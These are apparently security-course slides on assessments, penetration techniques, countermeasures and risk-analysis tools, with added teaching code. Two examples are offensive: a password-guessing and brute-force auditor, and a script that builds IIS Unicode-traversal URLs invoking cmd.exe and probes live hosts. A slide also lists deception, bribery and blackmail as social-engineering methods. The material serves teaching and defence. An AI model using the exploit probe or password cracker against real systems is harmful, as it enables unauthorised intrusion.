Assessments
Lesson 3
The Hacker mindset
- A hacker is someone who tries to "figure out how things work"
- Originally a term of respect given to the uber-geek: someone who could quickly create software code that worked, i.e. "hack out" a routine
- The original hackers were often looking for loopholes to increase their allotment of CPU time on early mainframes
- A quest for knowledge
The Cracker mindset
- Someone who tries to break into a computer system for malicious purposes (defacement, theft, fraud, denial of service)
- The term is thought to have been coined by hackers in the 1980s to differentiate themselves
- The media says "hacker" when it usually means "cracker"
- The key is the intent of the actions and the attitude
The Cracker mindset (cont.)
- Lots of examples of cracker activity
- Theft: CD Universe and 300,000 credit cards (January 2000)
  - Russian cracker named Maxus
  - Ransom demand of $100K to $300K
- Defacements: the Internet is a tempting target
  - BizRate.com estimated sales of $1.2B during a single week of December 2000
Typical Cracker Activity 2/18/01
What are security assessments
- Assessments are an examination of an organization's current security posture
- A good mechanism to find and fix holes before someone else finds them
- Keep in mind: someone else is looking for your security holes even if you aren't
What are security assessments (cont.)
- Three common terms for security assessments: security audit, risk assessment, penetration test
- They are sometimes used synonymously, but they are not the same
What are security assessments (cont.)
- Security Audit
  - More of a compliance check: checklists and standards, policies and procedures, backups, verification
  - Are you doing what you are supposed to be doing?
  - BS 7799 (British Standards Institution Code of Practice for Information Security Management; its content later became ISO/IEC 17799 and then ISO/IEC 27001/27002)
  - Controls and practices
What are security assessments (cont.)
- Risk Assessment
  - Also more of a paper exercise
  - Weighs likelihood against impact
  - Weighs cost against benefit
  - Much more business oriented
What are security assessments (cont.)
- Penetration Test
  - Looks for security vulnerabilities: unpatched operating systems or applications, known security holes, accounts with weak or no passwords
  - Examines the impact of discovered vulnerabilities
  - Targets digital, physical, and personnel (social engineering)
  - A hands-on test of network security; more thorough and effective at finding exploitable weaknesses than a paper review, though it only proves what was found, not that nothing else exists
Penetration Techniques
- Breaking into computers and networks can involve technical attacks or social engineering
- Technical attacks involve eavesdropping and breaches of access controls
- Social engineering (misrepresentation) relies on lies, bribes and forms of seduction that can trick honest or marginally dishonest employees into revealing authentication information
Technical Attacks
- Breaching access controls
  - Brute-force attacks
    - Demon/war dialing
    - Exhaustive search for userid/password
    - Scavenging RAM
  - Intelligent guesswork
    - Canonical passwords (default passwords and accounts)
    - Bad passwords
    - Discarded media
    - Shoulder surfing
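The two guessing strategies above, intelligent guesswork (defaults, the username itself, common words with cheap suffixes) tried before any exhaustive search, as an added offline password audit. This is example code written for this lesson, not code from the slides or from any tool they mention: the account list, the salted SHA-256 storage format and the default-password table are constructed for illustration.

```python
"""Offline password audit: canonical (default) passwords and intelligent guesswork
before exhaustive search.  Added example; account data and hash format are constructed."""
import hashlib
import itertools
from typing import Optional

# Canonical passwords: vendor defaults and well-known "bad" passwords (constructed list).
CANONICAL = ["password", "admin", "changeme", "welcome", "letmein", "123456", "qwerty", ""]

def salted_hash(salt: str, pw: str) -> str:
    """Assumed storage format: hex SHA-256 of salt + password."""
    return hashlib.sha256((salt + pw).encode()).hexdigest()

# Constructed sample credential store: (username, salt, digest).
ACCOUNTS = [
    ("admin",  "s1", salted_hash("s1", "admin")),         # default account/password pair
    ("jsmith", "s2", salted_hash("s2", "jsmith1")),       # username plus a digit
    ("backup", "s3", salted_hash("s3", "Welcome")),       # capitalised common word
    ("svc_db", "s4", salted_hash("s4", "")),              # empty password
    ("carol",  "s5", salted_hash("s5", "xK9#qL2!vB7p")),  # strong; should survive the audit
]

def guesses_for(user: str):
    """Intelligent guesswork: cheap, high-yield candidates tried before any exhaustive search."""
    base = [user, user.capitalize()] + CANONICAL + [c.capitalize() for c in CANONICAL if c]
    seen = set()
    for word in base:
        for suffix in ["", "1", "123", "!"]:
            cand = word + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand

def exhaustive(alphabet: str, max_len: int):
    """Exhaustive search over a small keyspace; cost grows as len(alphabet) ** length."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            yield "".join(tup)

def audit_account(user: str, salt: str, digest: str,
                  brute_alphabet: str = "", brute_len: int = 0) -> Optional[str]:
    """Return the recovered password, or None if no candidate matched."""
    for cand in guesses_for(user):
        if salted_hash(salt, cand) == digest:
            return cand
    if brute_alphabet:  # last resort, only for a tiny keyspace
        for cand in exhaustive(brute_alphabet, brute_len):
            if salted_hash(salt, cand) == digest:
                return cand
    return None

def audit(accounts=ACCOUNTS) -> dict:
    """Audit every account; maps username -> recovered password, or None."""
    return {u: audit_account(u, s, d) for (u, s, d) in accounts}

if __name__ == "__main__":
    for user, pw in audit().items():
        print(f"{user:8s} {'WEAK: ' + repr(pw) if pw is not None else 'not guessed'}")
```

Four of the five constructed accounts fall to guesswork alone without touching the exhaustive search, which is the point: a penetration tester (and the operations team auditing its own password file) should exhaust the canonical list first and reserve brute force for scoped, authorised use.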
Technical Attacks (cont.)
- Intercepting communications: information can be obtained by monitoring the channel between a peripheral node and the host
  - Wiretapping: intercepting the data stream on a communications channel
    - Phone lines, leased lines, long-distance transmissions
    - Internet connections
    - LAN sniffers
    - Optical fiber (can be tapped)
  - Wireless: radio and wireless phones, wireless networks, cellular, packet radio
  - Van Eck interception (emanations security)
Technical Attacks (cont.)
- Penetration testing
  - Look for vulnerabilities in applications and services
  - Commercial and freeware scanners; many specialized freeware vulnerability scanners
    - Whisker scans for over 500 web-based vulnerabilities, can scan over SSL and has IDS evasion modes; very powerful in the right hands
  - There's a scanner for most major vulnerabilities; freeware scanners are usually better and more up to date
  - Examine each target and the services on the target
  - Examine logins and use brute-force tools if allowed
  - Lots of research
Technical Attacks (cont.)
- Penetration testing: web testing
  - Scan for vulnerabilities
    - Example: Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversal vulnerability, published October 2000 (Microsoft bulletin MS00-078). An overlong UTF-8 encoding of "/" or "\" in the URL (for example %c0%af) is decoded after the server's "../" check, giving access to files with IUSR account permissions on the same logical drive as the web server; reaching cmd.exe through an executable directory can give a remote attacker a command line
  - Scan for the presence of sample materials
  - Examine the code of web pages (view source)
  - Examine input fields
  - Create test accounts if allowed
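A probe builder and response classifier for the IIS Unicode traversal just described, added here as an example; it is not code from the slides or from any scanner they mention. The base address 192.0.2.10 is a documentation address, the two response bodies are constructed, and the set of executable virtual directories is an assumption about a default install. The live probe() function sends requests and must only be pointed at hosts you are authorised to test.

```python
"""Probe builder and response classifier for the IIS 4.0/5.0 Unicode directory traversal.
Added example; sample responses are constructed."""
import re
import urllib.request
from urllib.parse import quote

# Overlong UTF-8 encodings that IIS decoded *after* its "../" check:
# %c0%af is an overlong "/" and %c1%9c an overlong "\".
TRAVERSAL_ENCODINGS = ["%c0%af", "%c1%9c"]

# Virtual directories assumed to have execute permission on a default install.
EXEC_DIRS = ["scripts", "msadc", "iisadmpwd", "_vti_bin"]

def build_probe_urls(base: str, depth: int = 2, command: str = "dir c:\\") -> list:
    """Candidate URLs that try to reach cmd.exe via the encoded traversal.

    `depth` is how many '..' hops climb from the virtual directory to the drive
    root; each URL asks cmd.exe /c to run `command`.
    """
    urls = []
    for vdir in EXEC_DIRS:
        for enc in TRAVERSAL_ENCODINGS:
            hop = ".." + enc  # '..' followed by the encoded separator
            path = f"/{vdir}/{hop * depth}winnt/system32/cmd.exe"
            urls.append(f"{base.rstrip('/')}{path}?/c+{quote(command, safe='')}")
    return urls

_DIR_LISTING = re.compile(r"Directory of [A-Za-z]:\\|<DIR>|Volume in drive", re.I)

def looks_exploitable(body: str) -> bool:
    """True when the body is a cmd.exe 'dir' listing rather than an error page."""
    return bool(_DIR_LISTING.search(body))

def probe(base: str, timeout: float = 5.0) -> list:
    """Live check (network): URLs whose response looks like command output."""
    hits = []
    for url in build_probe_urls(base):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                if looks_exploitable(resp.read(4096).decode("latin-1", "replace")):
                    hits.append(url)
        except Exception:
            continue  # connection refused, 404, timeout: not a hit
    return hits

# Constructed sample responses for offline use.
SAMPLE_VULNERABLE = (" Volume in drive C has no label.\n Directory of c:\\\n\n"
                     "10/17/2000  <DIR>  Inetpub\n")
SAMPLE_PATCHED = "<html><head><title>The page cannot be found</title></head></html>"

if __name__ == "__main__":
    for u in build_probe_urls("http://192.0.2.10")[:2]:
        print(u)
    print("vulnerable sample:", looks_exploitable(SAMPLE_VULNERABLE))
    print("patched sample:   ", looks_exploitable(SAMPLE_PATCHED))
```

The classifier keys on the shape of a directory listing rather than on an HTTP status, because a vulnerable server returns 200 for both the listing and many error pages; a finding should record the exact URL that worked, since that is what the report and the fix verification will need.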
Technical Attacks (cont.)
- Penetration testing: dial-up
  - An often overlooked, and often unsecured, access method
  - Dial company phone numbers looking for modems; several commercial and freeware scanners are available
  - Test the security of discovered modems: default passwords work most of the time
  - Test remote access packages with their client software
- Penetration testing: wireless networks
  - Often left with little or no security
  - The radio footprint often extends into publicly accessible areas
Social Engineering
- Penetration testing: social engineering
  - Might not be allowed; confirm it is in scope before attempting it
  - Trying to trick someone into giving you access: pose as an administrator, pose as a new user, sound like you belong
  - Lying: impersonating authorized personnel, impersonating third-party personnel
  - Subverting employees and third-party personnel: bribery, seduction, extortion, blackmail
Physical Techniques
- Penetration testing: physical
  - Door and lock testing: are servers locked up? Is access to telco closets secured?
  - Shoulder surfing, clipboard testing, dumpster diving
  - Work area security: do employees use password-protected screensavers? Passwords on stickies? Sensitive materials left out?
Results
- Document and catalog
- Determine the extent of discovered vulnerabilities to answer "how bad is it"
- Record discoveries, systems affected, method of exploit, accounts and systems compromised
- Must keep the information organized
Reporting
- Report generation
  - Provide a management-level summary
  - Provide a technical-level summary
  - Present findings in a clear and specific manner
  - Provide solutions to eliminate or mitigate vulnerabilities
  - The report is usually the only physical remnant of the assessment
Countermeasures
- Strengthening the perimeter
- Identification: single sign-on decreases the risk that somebody writes something down
- Authentication: designed to make impersonation difficult
  - Biometrics
  - Callback
  - Smart cards and tokens
  - One-time passwords
- Encryption: transmission, data storage
- Monitoring
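One-time passwords, listed above as an authentication countermeasure, as a worked example: a counter-based OTP (HOTP, RFC 4226) with the server-side check that makes a captured code useless for replay. This is added example code, not from the slides; the shared secret is the RFC 4226 test-vector key, and the TokenRecord class and its look-ahead window are constructed for illustration.

```python
"""One-time passwords (HOTP, RFC 4226) as an authentication countermeasure.
Added example; the server record and look-ahead window are constructed."""
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-SHA1 of the 8-byte big-endian counter, dynamically truncated to
    a 31-bit integer, then reduced to `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24 | mac[offset + 1] << 16
            | mac[offset + 2] << 8 | mac[offset + 3])
    return str(code % (10 ** digits)).zfill(digits)

class TokenRecord:
    """Server-side state for one user's token: the secret and the next expected counter."""
    def __init__(self, secret: bytes, counter: int = 0, look_ahead: int = 5):
        self.secret, self.counter, self.look_ahead = secret, counter, look_ahead

    def verify(self, code: str) -> bool:
        """Accept a code within the look-ahead window (token pressed but not
        used), then advance past it so the same code can never be replayed."""
        for c in range(self.counter, self.counter + self.look_ahead + 1):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.counter = c + 1
                return True
        return False

SECRET = b"12345678901234567890"  # RFC 4226 Appendix D test key

if __name__ == "__main__":
    rec = TokenRecord(SECRET)
    print([hotp(SECRET, i) for i in range(3)])          # 755224 287082 359152
    print(rec.verify("755224"), rec.verify("755224"))   # True, then False (replay)
```

Contrast with the static passwords of the earlier slides: shoulder surfing or a sniffed login captures a code that is already spent, and the only secret worth stealing now sits on the token and the server, not in the user's head or on a sticky note.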
Risk Analysis Automated Tools
- The Buddy System® is a hybrid software package used to identify and deal with system or project risks. It offers both qualitative and quantitative risk analysis and reporting of information or physical security in virtually any environment.
- The purpose of ASSET is to automate the completion of the questionnaire contained in NIST Special Publication 800-26, "Security Self-Assessment Guide for Information Technology Systems" (since withdrawn by NIST).
- HIPAA EarlyView™ Security version 2.0 was designed to help covered entities assess their current state of compliance with the Final HIPAA Security Rule. Users answer a series of 165 questions that correspond to each requirement, and the software features over 20 built-in reports to help track progress.
Fundamental Elements of a Risk Analysis Tool
A comprehensive risk analysis tool consists of three fundamental steps:
- Data collection
- Analysis
- Output results
Not only should the risk analysis tool meet these basic criteria, it should meet organizational requirements as well.
Data Collection
- Asset identification and valuation
- Threat assessment
- Vulnerability assessment
- Current safeguard effectiveness
Analysis
The analytical process analyzes the relationships between assets, threats, vulnerabilities and/or safeguards, and possibly other elements (e.g., likelihood of occurrence) to determine potential losses.
- Some automated risk analysis tools use the traditional quantitative approach for calculating risks: Annual Loss Expectancy (ALE), the loss from one occurrence multiplied by the expected number of occurrences per year.
- Some risk analysis tools do not average the value of future losses but calculate single occurrence losses (SOL).
- The qualitative approach takes the point of view that many potential losses are intangible; therefore, risks cannot be easily specified monetarily. Risk results are portrayed in linguistic terms (i.e., "no risk" to "very high risk").
Output results
- Some tools do not address safeguard selection, while some do an extensive job.
- Some tools consider the costs of safeguards and their return on investment (ROI).
- The important point is that the risk analysis tool should provide managers with a good understanding of where to apply limited dollars to protect vital computer assets.
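The three calculations the analysis and output steps describe (single-occurrence loss, annual loss expectancy, qualitative banding) and a safeguard cost/benefit ranking, carried through on one constructed scenario. This is an added example, not code from any tool named on the page; the asset values, exposure factors, annual rates of occurrence, safeguard costs and the thresholds in qualitative_level are all assumed.

```python
"""Quantitative (SOL, ALE) and qualitative risk analysis plus safeguard cost/benefit.
Added example; all figures and banding thresholds are constructed."""
from dataclasses import dataclass

@dataclass
class Exposure:
    asset: str
    threat: str
    asset_value: float      # replacement/recovery value in dollars
    exposure_factor: float  # fraction of the asset lost per occurrence (0..1)
    aro: float              # annualised rate of occurrence (events per year)

    def sol(self) -> float:
        """Single occurrence loss: what one incident costs."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annual loss expectancy: single-occurrence loss averaged over a year."""
        return self.sol() * self.aro

@dataclass
class Safeguard:
    name: str
    annual_cost: float
    aro_reduction: float = 0.0  # fraction by which it cuts frequency
    ef_reduction: float = 0.0   # fraction by which it cuts impact per event

    def residual(self, e: Exposure) -> Exposure:
        """The exposure that remains once this safeguard is in place."""
        return Exposure(e.asset, e.threat, e.asset_value,
                        e.exposure_factor * (1 - self.ef_reduction),
                        e.aro * (1 - self.aro_reduction))

    def annual_benefit(self, e: Exposure) -> float:
        """Net benefit = ALE before - ALE after - safeguard cost (positive: worth buying)."""
        return e.ale() - self.residual(e).ale() - self.annual_cost

def qualitative_level(ale: float, asset_value: float) -> str:
    """Linguistic banding of expected annual loss relative to asset value (assumed thresholds)."""
    if ale <= 0:
        return "no risk"
    r = ale / asset_value
    return "low" if r < 0.01 else "medium" if r < 0.1 else "high" if r < 0.5 else "very high"

def rank_safeguards(e: Exposure, options) -> list:
    """Safeguards ordered by net annual benefit, best first."""
    return sorted(options, key=lambda s: s.annual_benefit(e), reverse=True)

# Constructed scenario: a customer database and two candidate safeguards.
DB = Exposure("customer DB", "cracker theft via unpatched web server",
              asset_value=2_000_000, exposure_factor=0.25, aro=0.5)
PATCHING = Safeguard("monthly patch cycle", annual_cost=60_000, aro_reduction=0.8)
ENCRYPT = Safeguard("encrypt stored data", annual_cost=120_000, ef_reduction=0.6)

if __name__ == "__main__":
    print(f"SOL ${DB.sol():,.0f}  ALE ${DB.ale():,.0f}  "
          f"({qualitative_level(DB.ale(), DB.asset_value)})")
    for s in rank_safeguards(DB, [PATCHING, ENCRYPT]):
        print(f"{s.name:22s} net benefit ${s.annual_benefit(DB):,.0f}/yr")
```

Note how the two safeguard types act on different factors: patching lowers the rate of occurrence, encryption lowers the loss per event. Both produce a positive net benefit here, but the ranking is what tells a manager where the first limited dollars should go.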
Picking an Automated Tool
"Guide for Selecting Automated Risk Analysis Tools", NIST SP 500-174
- An automated risk analysis tool should contain modules for data collection, analysis, and output results.
- Effective reporting of the risk analysis results will help managers to weigh the alternatives and to select reliable and cost-effective safeguards. Therefore, the types of information expected in the output reports should be clearly defined.
- The ability to maintain a history of the information collected during the data collection phase of the analysis is useful in subsequent reviews or queries.
Example selection: Unemployment Insurance Risk Analysis Project (Gartner Group)
Project staff contacted the vendors and arranged on-site evaluations of their automated risk analysis tools and training programs. The evaluation was performed using the National Institute of Standards and Technology's (NIST) Special Publication 500-174, Guide for Selecting Automated Risk Analysis Tools. For evaluation purposes, NIST recommends scoring the tools in various areas of capability.
Each NIST capability was scored from 0 to 3. A score of 0 indicated that the capability did not exist, or if it did exist its quality was inferior. A score of 1 indicated that the capability existed but was less than adequate to perform the required tasks. A score of 2 indicated that the capability existed and was considered average. A score of 3 indicated that the capability existed and was considered above average. The capability scores were then totaled to determine the best available automated risk analysis tool.
WEIGHT FACTOR (score 0-3 per capability)
CAPABILITIES                              RISKWATCH   LAVA   RISKPAC
METHODOLOGY:
  Quantitative Results                        3         1       1
  Qualitative Results                         3         2       2
DATA COLLECTION CAPABILITY:
  Assets                                      3         2       2
  Threat Sources                              2         2       2
  Vulnerabilities                             3         2       2
  Safeguards Evaluation Effectiveness         3         2       2
UTILITY:
  Ease of Use                                 3         3       3
  Menu Driven                                 3         3       3
  On-line Help Facility                       3         0       2
  Error Messages                              3         0       2
  Reiterative Safeguard Selection             3         2       2
  Quality of Documentation                    3         3       3
SECURITY CONTROLS:
  Log-on/Password                             2         0       0
  Audit Trail                                 2         0       1
REPORTING CAPABILITIES:
  Safeguard Selection                         2         1       1
  Safeguard Cost/Benefit Analysis             3         1       1
  Management Oriented Format                  2         1       1
  Graphic Representations                     3         2       0
  Detail Narrative                            2         1       1
  Print/Display Full Report                   2         1       2
  Print/Display Loss Analysis                 2         1       1
  Cover Pages                                 2         2       0
  Table of Contents                           1         2       0
  Page Header/Footers                         1         1       1
PRODUCTION SUPPORT:
  Vendor Provided Training                    3         2       2
  Installation Support                        3         3       3
  Telephone Support                           3         3       3
  Scheduled Enhancements                      3         3       1
OTHER:
  Cost                                        2         2       3
  SESA Knowledge Base                         3         1       2
  Tailoring for Site Specific Concerns        3         0       2
TOTALS                                       44        27      25
(Totals as given in the source. They are not the unweighted column sums, which come to 79, 49 and 51, so the weight factor evidently applied per-capability weights that the slide does not show.)
CRAMM Methodology
- Developed in 1986-1987; the latest version at the time of these slides (V3.0) was released in 1997
- Used in thousands of reviews worldwide
- Provides the ability to check scenarios (what-if)
- Provides a catalog of threats and countermeasures
CRAMM (cont.)
- Risk evaluation is done by evaluating:
  - assets (scale 1 to 10)
  - threats (scale 1 to 3)
  - vulnerabilities (scale 1 to 3)
- Impact evaluation is integrated in the vulnerability evaluation
CRAMM phases
- Phase 1: definition of the study's boundaries
  - Preparations
  - Asset evaluation
  - Findings review
- Phase 2: threat evaluation
  - Establishing the relations between assets and threats
  - Evaluation of threats and vulnerabilities
  - Calculation of the risk level
  - Findings review
- Phase 3: countermeasure selection
  - Recognition of the selected countermeasures
  - Comparison with those already in place
  - Design of the security package
  - Findings review
Types of countermeasures
- Reduces the probability of threat occurrence
- Reduces vulnerabilities
- Reduces impacts
- A combination of these
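The CRAMM scales (asset 1 to 10, threat 1 to 3, vulnerability 1 to 3) combined into a risk level, with a what-if check showing which scale each of the four countermeasure types above moves. This is an added example, not CRAMM's own code or its published lookup matrix: the combination rule in risk_level (a level from 1 to 7) is an assumption chosen only to reproduce the shape of such a matrix, and the scenario values are constructed.

```python
"""CRAMM-style risk level from asset, threat and vulnerability scales, and the
effect of each countermeasure type.  Added example; the combining rule is assumed."""
from dataclasses import dataclass, replace

@dataclass(frozen=True)
class Scenario:
    asset: int          # asset value / impact, 1..10
    threat: int         # threat level (likelihood), 1..3
    vulnerability: int  # vulnerability level, 1..3

def risk_level(s: Scenario) -> int:
    """Risk level 1..7 (assumed rule, not CRAMM's matrix): asset value sets the
    band, threat and vulnerability shift within it.  Ranges are validated first."""
    if not (1 <= s.asset <= 10 and 1 <= s.threat <= 3 and 1 <= s.vulnerability <= 3):
        raise ValueError(f"out of range: {s}")
    base = (s.asset - 1) // 2                       # 0..4 from asset value
    shift = (s.threat - 1) + (s.vulnerability - 1)  # 0..4 from likelihood
    return max(1, min(7, 1 + base + shift // 2 + (1 if shift == 4 else 0)))

COUNTERMEASURE_TYPES = {
    # which scale each of the slide's four countermeasure types lowers
    "reduce probability of threat": ("threat",),
    "reduce vulnerability":         ("vulnerability",),
    "reduce impact":                ("asset",),
    "combination":                  ("threat", "vulnerability", "asset"),
}

def apply_countermeasure(s: Scenario, kind: str, amount: int = 1) -> Scenario:
    """Lower the scale(s) this countermeasure type affects by `amount`, never below 1."""
    fields = COUNTERMEASURE_TYPES[kind]
    return replace(s, **{f: max(1, getattr(s, f) - amount) for f in fields})

def what_if(s: Scenario) -> dict:
    """Scenario check ('what-if'): the risk level after each countermeasure type."""
    return {k: risk_level(apply_countermeasure(s, k)) for k in COUNTERMEASURE_TYPES}

# Constructed scenario: a high-value asset facing a likely threat it is exposed to.
PAYROLL = Scenario(asset=9, threat=3, vulnerability=3)

if __name__ == "__main__":
    print("baseline risk level:", risk_level(PAYROLL))
    for kind, lvl in what_if(PAYROLL).items():
        print(f"  {kind:30s} -> {lvl}")
```

With the assumed rule, trimming one point off the asset's impact leaves a top-band asset at the same level, while lowering threat or vulnerability by one step drops it a level and the combination drops it two: the what-if table makes visible which of the three factors a proposed security package actually moves.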
Summary
- Hacker mentality
- Security assessments
- Penetration techniques
- Risk analysis tools
- CRAMM